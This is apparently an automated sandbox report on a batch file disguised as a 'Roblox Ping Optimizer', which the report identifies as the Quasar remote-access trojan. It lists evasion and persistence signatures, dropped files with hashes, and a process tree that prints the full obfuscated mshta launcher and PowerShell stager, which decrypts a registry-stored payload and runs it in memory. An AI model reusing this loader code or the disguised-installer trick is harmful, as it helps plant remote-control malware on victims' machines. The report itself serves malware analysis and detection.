Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-05-2024 22:11

General

  • Target

    RobloxPingOptimizer-Main-x64.NEW/RobloxPingOptimizer-Main-x64/Main/RobloxPingOptimizer.bat

  • Size

    15.6MB

  • MD5

    0e7fa38a2267f6c3c8b0afafda56ef99

  • SHA1

    e116a71ae311011f1fc2697e84575990b75d96b4

  • SHA256

    30800e9982e73ce9a2f315b05630225f57b6ae1d219902b8dcde6031d840a553

  • SHA512

    75f5108166ac7224f5797941f57ada798a1bb760850677618770fb4aa7c9dd3d9298013afde66a0eba303852c9dfb2277b8bda61243c161b35975f1030ed9e98

  • SSDEEP

    49152:Cdxc9riM4QO4C2ltO7iHK35ROUcdDvgVNfLH9QDn7OusKIV+cDBGVKKjU5ECeNNI:k

Malware Config

Extracted

Family

quasar

Attributes
  • reconnect_delay

    3000

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 5 IoCs
  • Drops file in System32 directory 13 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
      PID:672
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
      1⤵
        PID:960
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
        1⤵
          PID:748
        • C:\Windows\System32\svchost.exe
          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
          1⤵
            PID:924
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
            1⤵
              PID:1060
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1068
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                1⤵
                • Drops file in System32 directory
                PID:1096
                • C:\Windows\system32\taskhostw.exe
                  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                  2⤵
                    PID:2748
                  • C:\Windows\$sxr-mshta.exe
                    C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-ywMXwfUBFNVJyDSrBIVk4312:sGZJBvMJ=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
                    2⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • Modifies registry class
                    • Suspicious use of WriteProcessMemory
                    PID:4764
                    • C:\Windows\$sxr-cmd.exe
                      "C:\Windows\$sxr-cmd.exe" /c %$sxr-ywMXwfUBFNVJyDSrBIVk4312:sGZJBvMJ=%
                      3⤵
                      • Executes dropped EXE
                      • Suspicious use of WriteProcessMemory
                      PID:4004
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:ynDiyxywMz; "
                        4⤵
                          PID:1372
                        • C:\Windows\$sxr-powershell.exe
                          C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass
                          4⤵
                          • Executes dropped EXE
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of SetWindowsHookEx
                          • Suspicious use of WriteProcessMemory
                          PID:640
                          • C:\Windows\$sxr-cmd.exe
                            "C:\Windows\$sxr-cmd.exe" /C set "FRhkOYfTRj=[System.Diagnostics.Process]::GetProcessById(640).WaitForExit();[System.Threading.Thread]::Sleep(5000); function RehQj($pAibt){ $vPowE=[System.Security.Cryptography.Aes]::Create(); $vPowE.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vPowE.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vPowE.Key=[System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))('G2RKZtcN6hkpnZXTVc3gUkD6zkZNhu+HP2nFGziH5go='); $vPowE.IV=[System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))('SDEeaycnJbFS9015ocCOJw=='); $ntIWU=$vPowE.('@C@r@e@a@t@e@D@e@c@r@y@p@t@o@r@'.Replace('@', ''))(); $pliUW=$ntIWU.('@T@r@a@n@s@f@o@r@m@F@i@n@a@l@B@l@o@c@k@'.Replace('@', ''))($pAibt, 0, $pAibt.Length); $ntIWU.Dispose(); $vPowE.Dispose(); $pliUW;}function DexhB($pAibt){ $sVDkh=New-Object System.IO.MemoryStream(,$pAibt); $yryyb=New-Object System.IO.MemoryStream; Invoke-Expression '$ntNJv @=@ @N@e@w@-@O@b@j@e@c@t@ @S@y@s@t@e@m@.@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@G@Z@i@p@S@t@r@e@a@m@(@$sVDkh,@ @[@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@C@o@m@p@r@e@s@s@i@o@n@M@o@d@e@]@:@:@D@e@c@o@m@p@r@e@s@s@)@;@'.Replace('@', ''); $ntNJv.CopyTo($yryyb); $ntNJv.Dispose(); $sVDkh.Dispose(); $yryyb.Dispose(); $yryyb.ToArray();}function KktQw($pAibt){ $pliUW = [System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))($pAibt); $pliUW = RehQj($pliUW); $pliUW = [System.Text.Encoding]::('@U@T@F@8@'.Replace('@', '')).('@G@e@t@S@t@r@i@n@g@'.Replace('@', ''))($pliUW); return $pliUW;}function execute_function($pAibt,$wEKyT){ $zjWEW = @( '$jvvcj = [System.@R@e@f@l@e@c@t@i@o@[email protected]]::@L@o@a@d@([byte[]]$pAibt);'.Replace('@', ''), '$cDqzB = $jvvcj.EntryPoint;', '$cDqzB.Invoke($null, $wEKyT);' ); foreach ($dJqQg in $zjWEW) { Invoke-Expression $dJqQg };}$JmHSu = KktQw('y11/dHJtjD3vwONFotaskg==');$Ymipw = KktQw('Wn6/WQPtP/S46okRUKjRC+GzKvWL1VezdUredriacfw=');$vcgus = KktQw('punO0rRR5cl9FpY6wXYKog==');$ulSUs = KktQw('SE1EhvXe93ZAgL1pCIjykQ==');if (@(get-process -ea silentlycontinue $ulSUs).count -gt 1) {exit};$UGypJ = [Microsoft.Win32.Registry]::('@L@o@c@a@l@M@a@c@h@i@n@e@'.Replace('@', '')).('@O@p@e@n@S@u@b@k@e@y@'.Replace('@', ''))($JmHSu).('@G@e@t@V@a@l@u@e@'.Replace('@', ''))($Ymipw);$VXpQb=DexhB (RehQj ([Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))($UGypJ)));execute_function $VXpQb (,[string[]] ($vcgus));" & echo Invoke-Expression $env:FRhkOYfTRj; | C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass > nul
                            5⤵
                            • Executes dropped EXE
                            PID:3996
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:FRhkOYfTRj; "
                              6⤵
                                PID:3188
                              • C:\Windows\$sxr-powershell.exe
                                C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass
                                6⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3672
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                      1⤵
                        PID:1212
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                        1⤵
                        • Drops file in System32 directory
                        PID:1244
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                        1⤵
                          PID:1272
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                          1⤵
                            PID:1388
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                            1⤵
                              PID:1400
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                              1⤵
                                PID:1448
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                1⤵
                                  PID:1464
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                  1⤵
                                    PID:1520
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                    1⤵
                                      PID:1616
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                      1⤵
                                        PID:1660
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                        1⤵
                                          PID:1716
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                          1⤵
                                            PID:1776
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                            1⤵
                                              PID:1792
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                              1⤵
                                                PID:1884
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1896
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                  1⤵
                                                    PID:1960
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                    1⤵
                                                      PID:1980
                                                    • C:\Windows\System32\spoolsv.exe
                                                      C:\Windows\System32\spoolsv.exe
                                                      1⤵
                                                        PID:1668
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                        1⤵
                                                          PID:2124
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                          1⤵
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2240
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                          1⤵
                                                            PID:2288
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                            1⤵
                                                              PID:2412
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                              1⤵
                                                                PID:2424
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                1⤵
                                                                  PID:2640
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                  1⤵
                                                                  • Drops file in System32 directory
                                                                  PID:2736
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                  1⤵
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2788
                                                                • C:\Windows\sysmon.exe
                                                                  C:\Windows\sysmon.exe
                                                                  1⤵
                                                                    PID:2832
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                    1⤵
                                                                      PID:2868
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                      1⤵
                                                                        PID:2888
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                        1⤵
                                                                          PID:2940
                                                                        • C:\Windows\system32\wbem\unsecapp.exe
                                                                          C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                          1⤵
                                                                            PID:684
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                            1⤵
                                                                              PID:3368
                                                                            • C:\Windows\Explorer.EXE
                                                                              C:\Windows\Explorer.EXE
                                                                              1⤵
                                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              • Suspicious use of UnmapMainImage
                                                                              PID:3464
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\RobloxPingOptimizer-Main-x64.NEW\RobloxPingOptimizer-Main-x64\Main\RobloxPingOptimizer.bat"
                                                                                2⤵
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:3560
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:LdjEKqpmmB; "
                                                                                  3⤵
                                                                                    PID:3048
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden
                                                                                    3⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Deletes itself
                                                                                    • Drops file in Windows directory
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:2924
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                1⤵
                                                                                  PID:3600
                                                                                • C:\Windows\system32\DllHost.exe
                                                                                  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                  1⤵
                                                                                    PID:3784
                                                                                  • C:\Windows\system32\SppExtComObj.exe
                                                                                    C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                    1⤵
                                                                                      PID:4704
                                                                                    • C:\Windows\System32\svchost.exe
                                                                                      C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                      1⤵
                                                                                        PID:4056
                                                                                      • C:\Windows\System32\svchost.exe
                                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                        1⤵
                                                                                          PID:1420
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                          1⤵
                                                                                            PID:2656
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                            1⤵
                                                                                            • Modifies data under HKEY_USERS
                                                                                            PID:4684
                                                                                          • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                            "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                            1⤵
                                                                                            • Drops file in System32 directory
                                                                                            • Modifies data under HKEY_USERS
                                                                                            PID:1580
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                            1⤵
                                                                                              PID:3948
                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                              1⤵
                                                                                                PID:2104
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                1⤵
                                                                                                  PID:4080
                                                                                                • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                  1⤵
                                                                                                  • Checks BIOS information in registry
                                                                                                  • Enumerates system info in registry
                                                                                                  PID:1324
                                                                                                • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                  C:\Windows\servicing\TrustedInstaller.exe
                                                                                                  1⤵
                                                                                                    PID:5040
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                    1⤵
                                                                                                      PID:4728
                                                                                                    • C:\Windows\System32\mousocoreworker.exe
                                                                                                      C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                      1⤵
                                                                                                      • Checks processor information in registry
                                                                                                      • Enumerates system info in registry
                                                                                                      PID:2624
                                                                                                    • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                      "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
                                                                                                      1⤵
                                                                                                        PID:4784
                                                                                                      • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                        "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                        1⤵
                                                                                                          PID:728
                                                                                                        • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                          "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                          1⤵
                                                                                                            PID:4752
                                                                                                          • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                            "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                            1⤵
                                                                                                              PID:4628

                                                                                                            Network

                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                            Replay Monitor

                                                                                                            Loading Replay Monitor...

                                                                                                            Downloads

                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                              Filesize

                                                                                                              53KB

                                                                                                              MD5

                                                                                                              a26df49623eff12a70a93f649776dab7

                                                                                                              SHA1

                                                                                                              efb53bd0df3ac34bd119adf8788127ad57e53803

                                                                                                              SHA256

                                                                                                              4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

                                                                                                              SHA512

                                                                                                              e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gta2o3lq.ocp.ps1
                                                                                                              Filesize

                                                                                                              60B

                                                                                                              MD5

                                                                                                              d17fe0a3f47be24a6453e9ef58c94641

                                                                                                              SHA1

                                                                                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                              SHA256

                                                                                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                              SHA512

                                                                                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                            • C:\Windows\$sxr-cmd.exe
                                                                                                              Filesize

                                                                                                              283KB

                                                                                                              MD5

                                                                                                              8a2122e8162dbef04694b9c3e0b6cdee

                                                                                                              SHA1

                                                                                                              f1efb0fddc156e4c61c5f78a54700e4e7984d55d

                                                                                                              SHA256

                                                                                                              b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

                                                                                                              SHA512

                                                                                                              99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

                                                                                                            • C:\Windows\$sxr-mshta.exe
                                                                                                              Filesize

                                                                                                              14KB

                                                                                                              MD5

                                                                                                              0b4340ed812dc82ce636c00fa5c9bef2

                                                                                                              SHA1

                                                                                                              51c97ebe601ef079b16bcd87af827b0be5283d96

                                                                                                              SHA256

                                                                                                              dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895

                                                                                                              SHA512

                                                                                                              d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

                                                                                                            • C:\Windows\$sxr-powershell.exe
                                                                                                              Filesize

                                                                                                              442KB

                                                                                                              MD5

                                                                                                              04029e121a0cfa5991749937dd22a1d9

                                                                                                              SHA1

                                                                                                              f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                                                                                              SHA256

                                                                                                              9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                                                                                              SHA512

                                                                                                              6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                                                                                                            • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
                                                                                                              Filesize

                                                                                                              2KB

                                                                                                              MD5

                                                                                                              8abf2d6067c6f3191a015f84aa9b6efe

                                                                                                              SHA1

                                                                                                              98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

                                                                                                              SHA256

                                                                                                              ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

                                                                                                              SHA512

                                                                                                              c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

                                                                                                            • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
                                                                                                              Filesize

                                                                                                              2KB

                                                                                                              MD5

                                                                                                              f313c5b4f95605026428425586317353

                                                                                                              SHA1

                                                                                                              06be66fa06e1cffc54459c38d3d258f46669d01a

                                                                                                              SHA256

                                                                                                              129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

                                                                                                              SHA512

                                                                                                              b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

                                                                                                            • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
                                                                                                              Filesize

                                                                                                              2KB

                                                                                                              MD5

                                                                                                              ceb7caa4e9c4b8d760dbf7e9e5ca44c5

                                                                                                              SHA1

                                                                                                              a3879621f9493414d497ea6d70fbf17e283d5c08

                                                                                                              SHA256

                                                                                                              98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

                                                                                                              SHA512

                                                                                                              1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

                                                                                                            • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
                                                                                                              Filesize

                                                                                                              2KB

                                                                                                              MD5

                                                                                                              7d612892b20e70250dbd00d0cdd4f09b

                                                                                                              SHA1

                                                                                                              63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

                                                                                                              SHA256

                                                                                                              727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

                                                                                                              SHA512

                                                                                                              f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

                                                                                                            • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
                                                                                                              Filesize

                                                                                                              2KB

                                                                                                              MD5

                                                                                                              1e8e2076314d54dd72e7ee09ff8a52ab

                                                                                                              SHA1

                                                                                                              5fd0a67671430f66237f483eef39ff599b892272

                                                                                                              SHA256

                                                                                                              55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

                                                                                                              SHA512

                                                                                                              5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

                                                                                                            • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
                                                                                                              Filesize

                                                                                                              2KB

                                                                                                              MD5

                                                                                                              0b990e24f1e839462c0ac35fef1d119e

                                                                                                              SHA1

                                                                                                              9e17905f8f68f9ce0a2024d57b537aa8b39c6708

                                                                                                              SHA256

                                                                                                              a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

                                                                                                              SHA512

                                                                                                              c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

                                                                                                            • memory/640-76-0x00000175F94F0000-0x00000175F94F6000-memory.dmp
                                                                                                              Filesize

                                                                                                              24KB

                                                                                                            • memory/640-73-0x00007FF9BD610000-0x00007FF9BD6CE000-memory.dmp
                                                                                                              Filesize

                                                                                                              760KB

                                                                                                            • memory/640-70-0x00000175FBB80000-0x00000175FC226000-memory.dmp
                                                                                                              Filesize

                                                                                                              6.6MB

                                                                                                            • memory/640-802-0x00000175FE550000-0x00000175FE58C000-memory.dmp
                                                                                                              Filesize

                                                                                                              240KB

                                                                                                            • memory/640-774-0x00000175FE3D0000-0x00000175FE472000-memory.dmp
                                                                                                              Filesize

                                                                                                              648KB

                                                                                                            • memory/640-772-0x00000175FE720000-0x00000175FE8E2000-memory.dmp
                                                                                                              Filesize

                                                                                                              1.8MB

                                                                                                            • memory/640-89-0x0000000180000000-0x0000000180007000-memory.dmp
                                                                                                              Filesize

                                                                                                              28KB

                                                                                                            • memory/640-771-0x00000175FE490000-0x00000175FE542000-memory.dmp
                                                                                                              Filesize

                                                                                                              712KB

                                                                                                            • memory/640-72-0x00007FF9BE6F0000-0x00007FF9BE8E5000-memory.dmp
                                                                                                              Filesize

                                                                                                              2.0MB

                                                                                                            • memory/640-769-0x00000175FE380000-0x00000175FE3D0000-memory.dmp
                                                                                                              Filesize

                                                                                                              320KB

                                                                                                            • memory/640-74-0x00000175F8EF0000-0x00000175F8F12000-memory.dmp
                                                                                                              Filesize

                                                                                                              136KB

                                                                                                            • memory/640-75-0x00000175F9440000-0x00000175F9446000-memory.dmp
                                                                                                              Filesize

                                                                                                              24KB

                                                                                                            • memory/640-71-0x00000175FC230000-0x00000175FC918000-memory.dmp
                                                                                                              Filesize

                                                                                                              6.9MB

                                                                                                            • memory/640-85-0x00000175FE010000-0x00000175FE052000-memory.dmp
                                                                                                              Filesize

                                                                                                              264KB

                                                                                                            • memory/640-84-0x00000175FDFA0000-0x00000175FE00A000-memory.dmp
                                                                                                              Filesize

                                                                                                              424KB

                                                                                                            • memory/640-81-0x00000175FDEB0000-0x00000175FDF62000-memory.dmp
                                                                                                              Filesize

                                                                                                              712KB

                                                                                                            • memory/640-80-0x00000175FDB20000-0x00000175FDEAC000-memory.dmp
                                                                                                              Filesize

                                                                                                              3.5MB

                                                                                                            • memory/640-79-0x00000175FD370000-0x00000175FDB1E000-memory.dmp
                                                                                                              Filesize

                                                                                                              7.7MB

                                                                                                            • memory/640-77-0x00000175FCE20000-0x00000175FD36E000-memory.dmp
                                                                                                              Filesize

                                                                                                              5.3MB

                                                                                                            • memory/672-102-0x000002C0BE090000-0x000002C0BE0B9000-memory.dmp
                                                                                                              Filesize

